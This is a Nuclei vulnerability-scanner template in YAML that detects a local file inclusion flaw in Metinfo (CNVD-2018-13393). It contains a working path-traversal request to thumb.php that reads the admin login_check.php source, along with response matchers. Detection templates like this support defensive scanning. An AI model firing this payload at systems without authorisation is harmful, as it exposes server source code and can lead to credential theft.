nuclei-templates/cnvd/2018/CNVD-2018-13393.yaml

34 lines
766 B
YAML

id: CNVD-2018-13393
info:
name: Metinfo - Local File Inclusion
author: ritikchaddha
severity: high
description: Metinfo is susceptible to local file inclusion.
reference:
- https://paper.seebug.org/676/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id:
cwe-id: CWE-22
tags: metinfo,cnvd,cvnd2018,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php'
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<?php"
- "login_met_cookie($metinfo_admin_name);"
condition: and
# Enhanced by mp on 2022/07/05